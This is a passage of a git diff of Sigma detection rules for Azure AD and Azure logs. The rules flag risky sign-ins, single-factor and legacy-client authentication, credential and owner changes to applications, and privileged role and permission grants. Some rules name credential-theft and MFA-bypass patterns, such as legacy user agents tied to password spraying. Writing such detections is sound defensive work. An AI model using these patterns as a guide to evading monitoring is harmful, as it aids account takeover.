Do Not Operate Out Of +id: 28870ae4-6a13-4616-bd1a-235a7fad7458 +status: test +description: Detect failed authentications from countries you do not operate out of. +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts +author: MikeDuddington, '@dudders1' +date: 2022/07/28 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1110 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: 'Success' + selection1: + Location|contains: '' + condition: not selection and not selection1 +falsepositives: + - If this was approved by System Administrator. +level: low diff --git a/src/main/resources/rules/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml b/src/main/resources/rules/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml new file mode 100644 index 000000000..e85511411 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml @@ -0,0 +1,24 @@ +title: Guest Users Invited To Tenant By Non Approved Inviters +id: 4ad97bf5-a514-41a4-abd3-4f3455ad4865 +status: test +description: Detects guest users being invited to tenant by non-approved inviters +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins +author: MikeDuddington, '@dudders1' +date: 2022/07/28 +tags: + - attack.initial_access + - attack.t1078 +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: 'UserManagement' + OperationName: 'Invite external user' + filter: + InitiatedBy|contains: '' + condition: selection and not filter +falsepositives: + - If this was approved by System Administrator. +level: medium diff --git a/src/main/resources/rules/azure/azure_ad_only_single_factor_auth_required.yml b/src/main/resources/rules/azure/azure_ad_only_single_factor_auth_required.yml new file mode 100644 index 000000000..a9673c1ec --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_only_single_factor_auth_required.yml @@ -0,0 +1,24 @@ +title: Azure AD Only Single Factor Authentication Required +id: 28eea407-28d7-4e42-b0be-575d5ba60b2c +status: test +description: Detect when users are authenticating without MFA being required. +references: + - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts +author: MikeDuddington, '@dudders1' +date: 2022/07/27 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1556.006 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: 'Success' + AuthenticationRequirement: 'singleFactorAuthentication' + condition: selection +falsepositives: + - If this was approved by System Administrator. +level: low diff --git a/src/main/resources/rules/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml b/src/main/resources/rules/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml new file mode 100644 index 000000000..dee8102de --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml @@ -0,0 +1,24 @@ +title: Suspicious SignIns From A Non Registered Device +id: 572b12d4-9062-11ed-a1eb-0242ac120002 +status: test +description: Detects risky authencaition from a non AD registered device without MFA being required. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in +author: Harjot Singh, '@cyb3rjy0t' +date: 2023/01/10 +tags: + - attack.defense_evasion + - attack.t1078 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: 'Success' + AuthenticationRequirement: 'singleFactorAuthentication' + DeviceDetail.trusttype: '' + RiskState: 'atRisk' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/azure/azure_ad_sign_ins_from_noncompliant_devices.yml b/src/main/resources/rules/azure/azure_ad_sign_ins_from_noncompliant_devices.yml new file mode 100644 index 000000000..a140f82c6 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_sign_ins_from_noncompliant_devices.yml @@ -0,0 +1,21 @@ +title: Sign-ins from Non-Compliant Devices +id: 4f77e1d7-3982-4ee0-8489-abf2d6b75284 +status: test +description: Monitor and alert for sign-ins where the device was non-compliant. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in +author: Michael Epping, '@mepples21' +date: 2022/06/28 +tags: + - attack.defense_evasion + - attack.t1078.004 +logsource: + product: azure + service: signinlogs +detection: + selection: + DeviceDetail.isCompliant: 'false' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/azure/azure_ad_sign_ins_from_unknown_devices.yml b/src/main/resources/rules/azure/azure_ad_sign_ins_from_unknown_devices.yml new file mode 100644 index 000000000..ea0ad71d9 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_sign_ins_from_unknown_devices.yml @@ -0,0 +1,25 @@ +title: Sign-ins by Unknown Devices +id: 4d136857-6a1a-432a-82fc-5dd497ee5e7c +status: test +description: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in +author: Michael Epping, '@mepples21' +date: 2022/06/28 +modified: 2022/10/05 +tags: + - attack.defense_evasion + - attack.t1078.004 +logsource: + product: azure + service: signinlogs +detection: + selection: + AuthenticationRequirement: singleFactorAuthentication + ResultType: 0 + NetworkLocationDetails: '[]' + DeviceDetail.deviceId: '' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/azure/azure_ad_suspicious_signin_bypassing_mfa.yml b/src/main/resources/rules/azure/azure_ad_suspicious_signin_bypassing_mfa.yml new file mode 100644 index 000000000..f5bdb20e1 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_suspicious_signin_bypassing_mfa.yml @@ -0,0 +1,28 @@ +title: Potential MFA Bypass Using Legacy Client Authentication +id: 53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc +status: test +description: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack. +references: + - https://blooteem.com/march-2022 + - https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/ +author: Harjot Singh, '@cyb3rjy0t' +date: 2023/03/20 +tags: + - attack.initial_access + - attack.credential_access + - attack.t1078.004 + - attack.t1110 +logsource: + product: azure + service: signinlogs +detection: + selection: + Status: 'Success' + userAgent|contains: + - 'BAV2ROPC' + - 'CBAinPROD' + - 'CBAinTAR' + condition: selection +falsepositives: + - Known Legacy Accounts +level: high diff --git a/src/main/resources/rules/azure/azure_ad_user_added_to_admin_role.yml b/src/main/resources/rules/azure/azure_ad_user_added_to_admin_role.yml new file mode 100644 index 000000000..cb4928305 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_user_added_to_admin_role.yml @@ -0,0 +1,28 @@ +title: User Added to an Administrator's Azure AD Role +id: ebbeb024-5b1d-4e16-9c0c-917f86c708a7 +status: test +description: User Added to an Administrator's Azure AD Role +references: + - https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/ +author: Raphaël CALVET, @MetallicHack +date: 2021/10/04 +modified: 2022/10/09 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098.003 + - attack.t1078 +logsource: + product: azure + service: activitylogs +detection: + selection: + Operation: 'Add member to role.' + Workload: 'AzureActiveDirectory' + ModifiedProperties{}.NewValue|endswith: + - 'Admins' + - 'Administrator' + condition: selection +falsepositives: + - PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled. +level: medium diff --git a/src/main/resources/rules/azure/azure_ad_users_added_to_device_admin_roles.yml b/src/main/resources/rules/azure/azure_ad_users_added_to_device_admin_roles.yml new file mode 100644 index 000000000..b44ceb6b4 --- /dev/null +++ b/src/main/resources/rules/azure/azure_ad_users_added_to_device_admin_roles.yml @@ -0,0 +1,28 @@ +title: Users Added to Global or Device Admin Roles +id: 11c767ae-500b-423b-bae3-b234450736ed +status: test +description: Monitor and alert for users added to device admin roles. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles +author: Michael Epping, '@mepples21' +date: 2022/06/28 +tags: + - attack.defense_evasion + - attack.privilege_escalation + - attack.t1078.004 +logsource: + product: azure + service: auditlogs +detection: + selection: + Category: RoleManagement + OperationName|contains|all: + - 'Add' + - 'member to role' + TargetResources|contains: + - '7698a772-787b-4ac8-901f-60d6b08affd2' + - '62e90394-69f5-4237-9190-012177145e10' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/azure/azure_app_appid_uri_changes.yml b/src/main/resources/rules/azure/azure_app_appid_uri_changes.yml index 3b4020f58..fd9df909a 100644 --- a/src/main/resources/rules/azure/azure_app_appid_uri_changes.yml +++ b/src/main/resources/rules/azure/azure_app_appid_uri_changes.yml @@ -1,24 +1,26 @@ title: Application AppID Uri Configuration Changes id: 1b45b0d1-773f-4f23-aedc-814b759563b1 +status: test description: Detects when a configuration change is made to an applications AppID URI. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022/06/02 -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed +tags: + - attack.persistence + - attack.credential_access + - attack.privilege_escalation + - attack.t1552 + - attack.t1078.004 logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: - selection: - properties.message: - - Update Application - - Update Service principal - condition: selection + selection: + properties.message: + - Update Application + - Update Service principal + condition: selection falsepositives: - - When and administrator is making legitmate AppID URI configuration changes to an application. This should be a planned event. + - When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event. level: high -status: experimental -tags: - - attack.t1528 - - attack.persistence - - attack.credential_access diff --git a/src/main/resources/rules/azure/azure_app_credential_added.yml b/src/main/resources/rules/azure/azure_app_credential_added.yml index 21f08f9e1..e2d3803a9 100644 --- a/src/main/resources/rules/azure/azure_app_credential_added.yml +++ b/src/main/resources/rules/azure/azure_app_credential_added.yml @@ -1,23 +1,23 @@ title: Added Credentials to Existing Application id: cbb67ecc-fb70-4467-9350-c910bdf7c628 -description: Detects when a new credential is added to an existing applcation. Any additional credentials added outside of expected processes could be a malicious actor using those credentials. +status: test +description: Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022/05/26 -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials +tags: + - attack.t1098.001 + - attack.persistence logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: - selection: - properties.message: - - Update Application-Certificates and secrets management - - Update Service principal/Update Application - condition: selection + selection: + properties.message: + - Update Application-Certificates and secrets management + - Update Service principal/Update Application + condition: selection falsepositives: - - When credentials are added/removed as part of the normal working hours/workflows + - When credentials are added/removed as part of the normal working hours/workflows level: high -status: experimental -tags: - - attack.t1098 - - attack.persistence diff --git a/src/main/resources/rules/azure/azure_app_credential_modification.yml b/src/main/resources/rules/azure/azure_app_credential_modification.yml index 5f226d2fc..4bc842cff 100644 --- a/src/main/resources/rules/azure/azure_app_credential_modification.yml +++ b/src/main/resources/rules/azure/azure_app_credential_modification.yml @@ -1,22 +1,23 @@ title: Azure Application Credential Modified id: cdeef967-f9a1-4375-90ee-6978c5f23974 +status: test description: Identifies when a application credential is modified. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/02 references: - https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/ +author: Austin Songer @austinsonger +date: 2021/09/02 +modified: 2022/10/09 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: 'Update application - Certificates and secrets management' condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Application credential added may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Application credential added may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_app_delegated_permissions_all_users.yml b/src/main/resources/rules/azure/azure_app_delegated_permissions_all_users.yml new file mode 100644 index 000000000..6b522d977 --- /dev/null +++ b/src/main/resources/rules/azure/azure_app_delegated_permissions_all_users.yml @@ -0,0 +1,21 @@ +title: Delegated Permissions Granted For All Users +id: a6355fbe-f36f-45d8-8efc-ab42465cbc52 +status: test +description: Detects when highly privileged delegated permissions are granted on behalf of all users +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions +author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' +date: 2022/07/28 +tags: + - attack.credential_access + - attack.t1528 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Add delegated permission grant + condition: selection +falsepositives: + - When the permission is legitimately needed for the app +level: high diff --git a/src/main/resources/rules/azure/azure_app_device_code_authentication.yml b/src/main/resources/rules/azure/azure_app_device_code_authentication.yml index 5301f8db6..8e02b76f0 100644 --- a/src/main/resources/rules/azure/azure_app_device_code_authentication.yml +++ b/src/main/resources/rules/azure/azure_app_device_code_authentication.yml @@ -1,27 +1,27 @@ title: Application Using Device Code Authentication Flow id: 248649b7-d64f-46f0-9fb2-a52774166fb5 -status: experimental +status: test description: | - Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. - If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. - This can be a misconfigured application or potentially something malicious. + Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments. + If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted. + This can be a misconfigured application or potentially something malicious. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022/06/01 -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows +tags: + - attack.t1078 + - attack.defense_evasion + - attack.persistence + - attack.privilege_escalation + - attack.initial_access logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - properties.message: Device Code - condition: selection + selection: + properties.message: Device Code + condition: selection falsepositives: - - Applications that are input constrained will need to use device code flow and are valid authentications. + - Applications that are input constrained will need to use device code flow and are valid authentications. level: medium -tags: - - attack.t1078 - - attack.defense_evasion - - attack.persistence - - attack.privilege_escalation - - attack.initial_access diff --git a/src/main/resources/rules/azure/azure_app_end_user_consent.yml b/src/main/resources/rules/azure/azure_app_end_user_consent.yml new file mode 100644 index 000000000..0311a2453 --- /dev/null +++ b/src/main/resources/rules/azure/azure_app_end_user_consent.yml @@ -0,0 +1,21 @@ +title: End User Consent +id: 9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a +status: test +description: Detects when an end user consents to an application +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent +author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' +date: 2022/07/28 +tags: + - attack.credential_access + - attack.t1528 +logsource: + product: azure + service: auditlogs +detection: + selection: + ConsentContext.IsAdminConsent: 'false' + condition: selection +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/azure/azure_app_end_user_consent_blocked.yml b/src/main/resources/rules/azure/azure_app_end_user_consent_blocked.yml new file mode 100644 index 000000000..37439a1a7 --- /dev/null +++ b/src/main/resources/rules/azure/azure_app_end_user_consent_blocked.yml @@ -0,0 +1,21 @@ +title: End User Consent Blocked +id: 7091372f-623c-4293-bc37-20c32b3492be +status: test +description: Detects when end user consent is blocked due to risk-based consent. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent +author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' +date: 2022/07/10 +tags: + - attack.credential_access + - attack.t1528 +logsource: + product: azure + service: auditlogs +detection: + selection: + failure_status_reason: 'Microsoft.online.Security.userConsentBlockedForRiskyAppsExceptions' + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/src/main/resources/rules/azure/azure_app_owner_added.yml b/src/main/resources/rules/azure/azure_app_owner_added.yml index 54b3b92f6..3b29d899f 100644 --- a/src/main/resources/rules/azure/azure_app_owner_added.yml +++ b/src/main/resources/rules/azure/azure_app_owner_added.yml @@ -1,23 +1,21 @@ title: Added Owner To Application id: 74298991-9fc4-460e-a92e-511aa60baec1 +status: test description: Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022/06/02 -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner +tags: + - attack.t1552 + - attack.credential_access logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: - selection: - properties.message: Add owner to application - condition: selection + selection: + properties.message: Add owner to application + condition: selection falsepositives: - - When a new application owner is added by an administrator + - When a new application owner is added by an administrator level: medium -status: experimental -tags: - - attack.t1528 - - attack.persistence - - attack.credential_access - - attack.defense_evasion diff --git a/src/main/resources/rules/azure/azure_app_permissions_msft.yml b/src/main/resources/rules/azure/azure_app_permissions_msft.yml new file mode 100644 index 000000000..31f70985f --- /dev/null +++ b/src/main/resources/rules/azure/azure_app_permissions_msft.yml @@ -0,0 +1,23 @@ +title: App Granted Microsoft Permissions +id: c1d147ae-a951-48e5-8b41-dcd0170c7213 +status: test +description: Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions +author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' +date: 2022/07/10 +tags: + - attack.credential_access + - attack.t1528 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Add delegated permission grant + - Add app role assignment to service principal + condition: selection +falsepositives: + - When the permission is legitimately needed for the app +level: high diff --git a/src/main/resources/rules/azure/azure_app_privileged_permissions.yml b/src/main/resources/rules/azure/azure_app_privileged_permissions.yml new file mode 100644 index 000000000..18ad0b8b3 --- /dev/null +++ b/src/main/resources/rules/azure/azure_app_privileged_permissions.yml @@ -0,0 +1,26 @@ +title: App Granted Privileged Delegated Or App Permissions +id: 5aecf3d5-f8a0-48e7-99be-3a759df7358f +related: + - id: ba2a7c80-027b-460f-92e2-57d113897dbc + type: obsoletes +status: test +description: Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions +author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' +date: 2022/07/28 +modified: 2023/03/29 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098.003 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: Add app role assignment to service principal + condition: selection +falsepositives: + - When the permission is legitimately needed for the app +level: high diff --git a/src/main/resources/rules/azure/azure_app_role_added.yml b/src/main/resources/rules/azure/azure_app_role_added.yml new file mode 100644 index 000000000..322583a2d --- /dev/null +++ b/src/main/resources/rules/azure/azure_app_role_added.yml @@ -0,0 +1,25 @@ +title: App Role Added +id: b04934b2-0a68-4845-8a19-bdfed3a68a7a +status: test +description: Detects when an app is assigned Azure AD roles, such as global administrator, or Azure RBAC roles, such as subscription owner. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#service-principal-assigned-to-a-role +author: Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow' +date: 2022/07/19 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.t1098.003 +logsource: + product: azure + service: auditlogs +detection: + selection: + properties.message: + - Add member to role + - Add eligible member to role + - Add scoped member to role + condition: selection +falsepositives: + - When the permission is legitimately needed for the app +level: medium diff --git a/src/main/resources/rules/azure/azure_app_ropc_authentication.yml b/src/main/resources/rules/azure/azure_app_ropc_authentication.yml index 82222f0ca..ea7a08a26 100644 --- a/src/main/resources/rules/azure/azure_app_ropc_authentication.yml +++ b/src/main/resources/rules/azure/azure_app_ropc_authentication.yml @@ -1,24 +1,26 @@ title: Applications That Are Using ROPC Authentication Flow id: 55695bc0-c8cf-461f-a379-2535f563c854 -description: Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider. +status: test +description: | + Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly. + The application then uses those credentials to authenticate the user against the identity provider. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022/06/01 -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows +tags: + - attack.t1078 + - attack.defense_evasion + - attack.persistence + - attack.privilege_escalation + - attack.initial_access logsource: - product: azure - service: signinlogs + product: azure + service: signinlogs detection: - selection: - properties.message: ROPC - condition: selection + selection: + properties.message: ROPC + condition: selection falsepositives: - - Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow + - Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow level: medium -status: experimental -tags: - - attack.t1078 - - attack.defense_evasion - - attack.persistence - - attack.privilege_escalation - - attack.initial_access diff --git a/src/main/resources/rules/azure/azure_app_uri_modifications.yml b/src/main/resources/rules/azure/azure_app_uri_modifications.yml index a2cda3522..cdae8aa64 100644 --- a/src/main/resources/rules/azure/azure_app_uri_modifications.yml +++ b/src/main/resources/rules/azure/azure_app_uri_modifications.yml @@ -1,24 +1,26 @@ title: Application URI Configuration Changes id: 0055ad1f-be85-4798-83cf-a6da17c993b3 -description: Detects when a configuration change is made to an applications URI. - URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, - or URIs that point to domains you do not control should be investigated. +status: test +description: | + Detects when a configuration change is made to an applications URI. + URIs for domain names that no longer exist (dangling URIs), not using HTTPS, wildcards at the end of the domain, URIs that are no unique to that app, or URIs that point to domains you do not control should be investigated. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes author: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik' date: 2022/06/02 -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-configuration-changes +tags: + - attack.t1528 + - attack.t1078.004 + - attack.persistence + - attack.credential_access + - attack.privilege_escalation logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: - selection: - properties.message: Update Application Sucess- Property Name AppAddress - condition: selection + selection: + properties.message: Update Application Sucess- Property Name AppAddress + condition: selection falsepositives: - - When and administrator is making legitmate URI configuration changes to an application. This should be a planned event. + - When and administrator is making legitimate URI configuration changes to an application. This should be a planned event. level: high -status: experimental -tags: - - attack.t1528 - - attack.persistence - - attack.credential_access diff --git a/src/main/resources/rules/azure/azure_application_deleted.yml b/src/main/resources/rules/azure/azure_application_deleted.yml index a2e52ca9d..7ac5228ee 100644 --- a/src/main/resources/rules/azure/azure_application_deleted.yml +++ b/src/main/resources/rules/azure/azure_application_deleted.yml @@ -1,24 +1,27 @@ title: Azure Application Deleted id: 410d2a41-1e6d-452f-85e5-abdd8257a823 +status: test description: Identifies when a application is deleted in Azure. -author: Austin Songer @austinsonger -status: experimental -date: 2021/09/03 references: - https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy +author: Austin Songer @austinsonger +date: 2021/09/03 +modified: 2022/10/09 +tags: + - attack.defense_evasion + - attack.impact + - attack.t1489 logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: properties.message: - Delete application - Hard Delete application condition: selection -level: medium -tags: - - attack.defense_evasion falsepositives: - - Application being deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Application being deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_application_gateway_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_application_gateway_modified_or_deleted.yml index d242e0caa..f0ad353c4 100644 --- a/src/main/resources/rules/azure/azure_application_gateway_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_application_gateway_modified_or_deleted.yml @@ -1,24 +1,25 @@ title: Azure Application Gateway Modified or Deleted id: ad87d14e-7599-4633-ba81-aeb60cfe8cd6 +status: test description: Identifies when a application gateway is modified or deleted. -author: Austin Songer -status: experimental -date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer +date: 2021/08/16 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/WRITE - MICROSOFT.NETWORK/APPLICATIONGATEWAYS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Application gateway being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Application gateway being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_application_security_group_modified_or_deleted.yml b/src/main/resources/rules/azure/azure_application_security_group_modified_or_deleted.yml index abd3d183e..0f7d34bc0 100644 --- a/src/main/resources/rules/azure/azure_application_security_group_modified_or_deleted.yml +++ b/src/main/resources/rules/azure/azure_application_security_group_modified_or_deleted.yml @@ -1,24 +1,25 @@ title: Azure Application Security Group Modified or Deleted id: 835747f1-9329-40b5-9cc3-97d465754ce6 +status: test description: Identifies when a application security group is modified or deleted. -author: Austin Songer -status: experimental -date: 2021/08/16 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations +author: Austin Songer +date: 2021/08/16 +modified: 2022/08/23 +tags: + - attack.impact logsource: - product: azure - service: activitylogs + product: azure + service: activitylogs detection: selection: - properties.message: + operationName: - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/WRITE - MICROSOFT.NETWORK/APPLICATIONSECURITYGROUPS/DELETE condition: selection -level: medium -tags: - - attack.impact falsepositives: - - Application security group being modified or deleted may be performed by a system administrator. - - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. - - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. + - Application security group being modified or deleted may be performed by a system administrator. + - Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. + - Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. +level: medium diff --git a/src/main/resources/rules/azure/azure_blocked_account_attempt.yml b/src/main/resources/rules/azure/azure_blocked_account_attempt.yml index cf0984b80..abdeae62c 100644 --- a/src/main/resources/rules/azure/azure_blocked_account_attempt.yml +++ b/src/main/resources/rules/azure/azure_blocked_account_attempt.yml @@ -1,10 +1,14 @@ title: Account Disabled or Blocked for Sign in Attempts id: 4afac85c-224a-4dd7-b1af-8da40e1c60bd +status: test description: Detects when an account is disabled or blocked for sign in but tried to log in -author: Yochana Henderson, '@Yochana-H' -date: 2022/06/17 references: - https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-privileged-accounts +author: Yochana Henderson, '@Yochana-H' +date: 2022/06/17 +tags: + - attack.initial_access + - attack.t1078.004 logsource: product: azure service: signinlogs @@ -13,11 +17,7 @@ detection: ResultType: 50057 ResultDescription: Failure condition: selection -level: medium falsepositives: - Account disabled or blocked in error - Automation account has been blocked or disabled -status: experimental -tags: - - attack.credential_access - - attack.t1110 +level: medium diff --git a/src/main/resources/rules/azure/azure_change_to_authentication_method.yml b/src/main/resources/rules/azure/azure_change_to_authentication_method.yml index b251b5c25..046bc2956 100644 --- a/src/main/resources/rules/azure/azure_change_to_authentication_method.yml +++ b/src/main/resources/rules/azure/azure_change_to_authentication_method.yml @@ -1,22 +1,27 @@ title: Change to Authentication Method id: 4d78a000-ab52-4564-88a5-7ab5242b20c7 -status: experimental +status: test +description: Change to authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access. +references: + - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts author: AlertIQ date: 2021/10/10 -description: Change to authentication method could be an indicated of an attacker adding an auth method to the account so they can have continued access. -references: - - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts +modified: 2022/12/25 +tags: + - attack.credential_access + - attack.t1556 + - attack.persistence + - attack.defense_evasion + - attack.t1098 logsource: - product: azure - service: auditlogs + product: azure + service: auditlogs detection: - selection: - LoggedByService: 'Authentication Methods' - Category: 'UserManagement' - OperationName: 'User registered security info' - condition: selection -level: medium + selection: + LoggedByService: 'Authentication Methods' + Category: 'UserManagement' + OperationName: 'User registered security info' + condition: selection falsepositives: - - Unknown -tags: - - attack.credential_access + - Unknown +level: medium diff --git 